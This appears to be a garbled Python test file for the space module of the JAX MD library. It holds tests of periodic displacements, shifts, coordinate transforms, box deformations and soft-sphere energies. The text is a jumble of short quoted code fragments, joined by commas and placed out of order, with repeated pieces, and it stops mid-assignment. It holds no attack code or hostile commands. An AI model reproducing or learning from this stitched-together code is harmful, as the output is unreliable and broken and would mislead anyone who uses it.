R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new", "def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "import absltest from absl.testing import parameterized from jax.config import config", "10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix']", "== 'matrix' else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g", "R * box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype,", "if spatial_dimension == 2: for i in range(-1, 2): for", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype):", "import grad, jit, jacfwd from jax import test_util as jtu", "from functools import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13)", "dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION", "disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn =", "i in range(-1, 2): for j in range(-1, 2): dR_shifted", "= 16 R_f, R, box, (s, E), (s_gf, E_gf), (s_g,", "under the License is distributed on an \"AS IS\" BASIS,", "= space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g", "'_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim in", "space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension ==", "dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif", "general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format ==", "PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION", "'_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for dim in", "random import jax.numpy as jnp from jax import grad, jit,", "E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split", "= ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64]", "in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size)", "jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted < dr_direct,", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R,", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key", "jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype,", "def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in", "= jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box) if", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype):", "box_format == 'scalar': raise SkipTest('Scalar case fails due to JAX", "> 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension),", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format):", "def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct)", "= space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2))", "= R * box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension),", "jax.config import config as jax_config from jax import random import", "ANY KIND, either express or implied. # See the License", "box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "3) key, split_t, split_R, split_dR = random.split(key, 4) size_0 =", "random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R),", "the License. # You may obtain a copy of the", "= random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size *", "in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size * random.uniform(", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format):", "# See the License for the specific language governing permissions", "= lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct =", "key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split =", "= random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct =", "dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( {", "box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES):", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension,", "quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if box_format == 'vector':", "POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "= jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR <", "dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR,", "(s, E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class", "dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R", "{ 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION))", "box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R,", "deformed_box = box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box)", "box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new =", "10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2,", "in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16", "'matrix' else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g =", "E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self,", "writing, software # distributed under the License is distributed on", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2,", "f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype, box_format):", "+ jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0", "dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn =", "max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R", "true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn", "'dtype': dtype } for dim in SPATIAL_DIMENSION for dtype in", "(spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda R:", "FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32] def", "(s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)", "split1, split2, split3 = random.split(key, 4) max_box_size = f32(10.0) box_size", "split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3)", "random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye", "spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1 =", "dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted,", "(spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype)", "+ dT + jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension),", "range(-1, 2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted", "= 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 *", "dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self,", "N = 16 R_f, R, box, (s, E), (s_gf, E_gf),", "0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f,", "general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R))", "assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT,", "= 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal(", "jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 =", "= space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric =", "_ in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3) dT", "T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct", "R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim),", "box_format == 'matrix' else box) d_gf, s_gf = space.periodic_general(box) d_g,", "j in range(-1, 2): for k in range(-1, 2): dR_shifted", "dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype == R.dtype", "dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct,", "grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn =", "R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g))", "BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for dim in SPATIAL_DIMENSION", "key, split1, split2 = random.split(key, 3) R = random.normal( split1,", "disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R,", "box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box)", "(eye + dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn", "POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self,", "{ 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format }", "range(-1, 2): for j in range(-1, 2): for k in", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension,", "new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self,", "+ jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted =", "split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye + dT +", "= 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar', 'vector',", "eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT", "jacfwd from jax import test_util as jtu from jax_md import", "tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2,", "shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn,", "0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list(", "jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1 = 10.0 *", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "from jax_md import space, test_util, quantity, energy from jax_md.util import", "random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension,", "case fails due to JAX Issue #5849.') N = 16", "dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 =", "= random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR)", "_ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3) key,", "not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( {", "dtype=dtype) R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf =", "R unwrapped_R = R displacement, shift = space.periodic_general(T) _, unwrapped_shift", "assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR)", "split2 = random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension),", "R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype ==", "jax import grad, jit, jacfwd from jax import test_util as", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box", "jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "* random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye", "test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "= space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R,", "in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0)", "import test_util as jtu from jax_md import space, test_util, quantity,", "T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R,", "box, (s, E), (s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N,", "spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "== 'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype) d, s", "d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box)", "in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for", "R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R", "2): for j in range(-1, 2): dR_shifted = dR +", "= space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension,", "grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype", "split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R * box_size dR", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box)", "key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13", "* 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "import config as jax_config from jax import random import jax.numpy", "specific language governing permissions and # limitations under the License.", "range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R = random.uniform(", "* box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "from absl.testing import absltest from absl.testing import parameterized from jax.config", "1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "elif spatial_dimension == 3: for i in range(-1, 2): for", "split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension),", "dr_shifted, dr_direct) elif spatial_dimension == 3: for i in range(-1,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R))", "R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "governing permissions and # limitations under the License. \"\"\"Tests for", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype)", "# you may not use this file except in compliance", "_, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _", "R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "from jax import grad, jit, jacfwd from jax import test_util", "> 0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49),", "dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0),", "disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R,", "spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key,", "= s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R,", "dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f))", "dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype", "spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric", "assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R)", "displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and", "dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,))", "dtype=dtype) R_scaled = R * box_size dR = random.normal( split3,", "dR = jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR", "random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal(", "box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "for _ in range(SHIFT_STEPS): key, split = random.split(key) dR =", "= 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for i in", "R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "under the Apache License, Version 2.0 (the \"License\"); # you", "energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect = lambda", "test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR =", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box", "import parameterized from jax.config import config as jax_config from jax", "box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix':", "to JAX Issue #5849.') N = 16 R_f, R, box,", "space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped(", "(), dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension),", "= space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after,", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale,", "unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS", "= jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype):", "dtype is f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES):", "= box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box),", "= space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split = random.split(key)", "in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for", "space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct", "R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype assert", "test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10", "a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 #", "box_format } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE", "space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list(", "= random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R))", "dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted", "= space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement)", "jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES =", "key, split = random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension),", "box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box))", "test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension,", "dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension ==", "spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box),", "* 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box))", "R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new =", "size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5", "['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else:", "shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 